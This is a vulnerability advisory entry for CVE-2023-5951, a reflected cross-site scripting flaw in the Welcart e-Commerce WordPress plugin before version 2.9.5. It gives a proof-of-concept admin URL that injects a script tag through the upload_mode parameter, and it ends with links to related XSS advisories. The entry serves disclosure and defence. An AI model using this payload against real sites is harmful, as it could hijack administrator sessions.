Welcart e-Commerce < 2.9.5 – Reflected XSS | CVE 2023-5951 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the URL below:

https://example.com/wp-admin/admin.php?page=usces_itemedit&action=upload_register&upload_mode=</script><script>alert(/XSS/)</script>

Affects Plugins

Fixed in 2.9.5

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Submitter

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

81dc093a-545d-4bcd-ab85-ee9472d709e5

Timeline

Publicly Published

2023-11-10 (about 6 months ago)

Added

2023-11-10 (about 6 months ago)

Last Updated

2023-11-10 (about 6 months ago)

Other

Published

Title

Published

2016-04-06

Title

Ultimate Member < 1.3.40 - Cross-Site Scripting (XSS)

Published

2023-10-31

Title

Admin Bar & Dashboard Control < 1.2.9 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2024-03-29

Title

Special Box for Content <= 1 - Authenticated (Administrator+) Stored Cross-Site Scripting

Published

2021-05-06

Title

PickPlugins Product Slider for WooCommerce < 1.13.22 - Reflected Cross-Site Scripting (XSS)

Published

2017-03-01

Title

WP-SpamFree Anti-Spam - Authenticated Reflected Cross-Site Scripting (XSS)